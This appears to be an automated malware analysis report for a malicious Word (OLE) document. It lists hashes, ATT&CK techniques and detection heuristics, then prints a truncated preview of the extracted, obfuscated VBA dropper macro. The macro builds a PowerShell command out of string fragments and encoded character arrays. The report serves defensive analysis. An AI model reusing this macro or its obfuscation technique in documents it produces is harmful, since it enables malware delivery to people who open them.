Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 47935d4b74c47d85…

MALICIOUS

Office (OLE)

Size: 140.0 KB
Created: 2018-06-22 10:11:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: b06051f8026609363d3041d433f92d73
SHA-1: 4173e9e2e9d037a349fd63927344fd378600f39e
SHA-256: 47935d4b74c47d8534ad2b516f640bace0527db8e4d4ab24faf68f2606ea4e02
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes a Shell() call and exhibits obfuscation, strongly suggesting it's designed to download and execute a secondary payload. The ClamAV signature 'Doc.Dropper.Agent-6587449-0' further confirms its malicious nature as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6587449-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6587449-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26552 bytes
SHA-256: cacd39fea6d64ad2d0b6f26ff184e024b8049970f042165549a1d512d21bda86

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "zzdYPwjMv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TjuBsShQ"
Function DkXtKs()
On Error Resume Next
jiAwk = (JzBVQK * 14898 + 57806 * CInt(ocjXW - CDbl(51929)) * 39020 * Oct(41780))
ZXEUb = "Hel" + "l " + " .(" + " $E" + "nV" + ":C" + "oM"
WQXwJ = (IaRof * 9973 + 67844 * CInt(RCWnZT - CDbl(48306)) * 20810 * Oct(15509))
XjlMUsPIiOj = "Spe" + "C[4" + ",26" + ",25" + "]-" + "jOi"
RIGsDV = (PJccTE * 24345 + 81840 * CInt(NptTwA - CDbl(10867)) * 59026 * Oct(28697))
BbCZD = "N'" + "')" + " ("
AnuCw = (IsiAG * 29534 + 45431 * CInt(uQvGVz - CDbl(96220)) * 19466 * Oct(93778))
ZLLUHmNo = " [s" + "tR" + "inG" + "]::" + "jO"
FjRofQ = (bdiVF * 39672 + 12940 * CInt(QKMipi - CDbl(96311)) * 34425 * Oct(97184))
QMMcqQidC = "IN" + "( " + "'' " + ", (" + " ["
iFzJR = (qqJwO * 90077 + 38996 * CInt(Nzilp - CDbl(49174)) * 77936 * Oct(91453))
jrZWcR = "CH" + "Ar" + "[]" + "](1"
DkXtKs = ZXEUb + XjlMUsPIiOj + BbCZD + ZLLUHmNo + QMMcqQidC + jrZWcR
bFmlcG = (HRSPz * 22715 + 6648 * CInt(MLfPK - CDbl(19144)) * 30021 * Oct(41295))
End Function
Function hFEAH()
On Error Resume Next
zUsEMc = (kmPXE * 59407 + 71215 * CInt(kIpzc - CDbl(9228)) * 29764 * Oct(3852))
cuqtcawnoz = "19," + "3 ," + "28,"
LYdtZk = (MjvmHO * 94955 + 90436 * CInt(tiKvfO - CDbl(64563)) * 50970 * Oct(34113))
wmICBbci = " 63" + " ," + "17" + " ,"
CUStlk = (zsnwf * 21265 + 4120 * CInt(LUiwGV - CDbl(20562)) * 88602 * Oct(15596))
TWaMLFCp = " 1" + "8 ," + " 11" + "5 "
ZFGOzr = (cuiKt * 81781 + 19493 * CInt(pQEHq - CDbl(27816)) * 38313 * Oct(15730))
HYihJ = ",1" + "10" + " ," + "115"
UtwbL = (raKKM * 59363 + 23470 * CInt(vwvCQT - CDbl(50337)) * 33658 * Oct(57638))
dFsJIRsFX = " ," + " 61" + ", " + "54" + " , " + "36 " + ",1"
hFEAH = cuqtcawnoz + wmICBbci + TWaMLFCp + HYihJ + dFsJIRsFX
wQEGm = (UFwut * 6263 + 86087 * CInt(Qlqjjj - CDbl(96410)) * 44977 * Oct(56686))
End Function
Function XDMJSZFz()
On Error Resume Next
JLuLDo = (DQZfvE * 72983 + 77034 * CInt(pGhRps - CDbl(6760)) * 38755 * Oct(73884))
WtfwfkYTRiw = "26," + "60," + " 4" + "9 ," + "57 "
dqizaZ = (XwbXIC * 16906 + 17968 * CInt(nSwVjE - CDbl(91458)) * 82812 * Oct(81355))
bNSuTAi = ", 5" + "4 ," + " 48" + ", " + "39" + ", 1"
pLrQHa = (XKuVS * 98389 + 11820 * CInt(hpMVh - CDbl(6874)) * 48266 * Oct(15916))
ozFEbJHJzj = "15" + " ," + "33" + ",50"
EkXRwZ = (qHijbf * 61242 + 38639 * CInt(jiwOVU - CDbl(38024)) * 80944 * Oct(24388))
MmHhEIoGd = " ," + "61" + ", " + "55" + " ," + "60"
PjWJoQ = (sMWCH * 47957 + 70802 * CInt(iKQWhB - CDbl(17844)) * 85225 * Oct(46364))
shrJjRHBpHh = " , " + "62" + ",10"
YatdkQ = (EzKLUw * 88801 + 36937 * CInt(nTzub - CDbl(10933)) * 26124 * Oct(28775))
IbnkbkcjGI = "4,1" + "19 " + ",3" + "5 ," + " 3"
XDMJSZFz = WtfwfkYTRiw + bNSuTAi + ozFEbJHJzj + MmHhEIoGd + shrJjRHBpHh + IbnkbkcjGI
KDTfwF = (zLPpJO * 53778 + 11876 * CInt(DZanJ - CDbl(24212)) * 42982 * Oct(6407))
End Function
Function TaGDjK()
On Error Resume Next
NpvdV = (NimZN * 27445 + 48765 * CInt(EVXmi - CDbl(56732)) * 25911 * Oct(47900))
bQAOObwoE = "0, " + "23," + "29"
qZYjnb = (zjQVkQ * 91590 + 38946 * CInt(wcfcCs - CDbl(12302)) * 57510 * Oct(46249))
MANTsa = " , " + "7 " + ", "
SmarZ = (ozEDzm * 49781 + 6820 * CInt(cjwEQ - CDbl(77381)) * 48824 * Oct(5410))
bizPrA = "24," + " 1" + "15 " + ",1"
iAiwpw = (uIRIv * 45205 + 79266 * CInt(YwSrQs - CDbl(17882)) * 5207 * Oct(53386))
mZMIjKnWMIj = "10" + ",11" + "5 ," + " 6" + "1, " + "54" + " ,"
ZLIZH = (tjdJYO * 84578 + 14795 * CInt(kCiIv - CDbl(16099)) * 9496 * Oct(83555))
jFOGp = "36" + ",1" + "26 " + ", 6" + "0 ," + "49," + " 57"
fUVim = (ZwGYQ * 73815 + 21249 * CInt(AkOMu - CDbl(61486)) * 33621 * Oct(19972))
pkaAhCw = " ,5" + "4 ," + " 48" + " ,"
Llfqi = (jPUUAu * 75229 + 23243 * CInt(wZkaH - CDbl(37125)) * 83474 * Oct(37623))
hHSDBDUDfWN = "39" + ", 1" + "15 " + ", 0" + " ,"
TaGDjK = bQAO
... (truncated)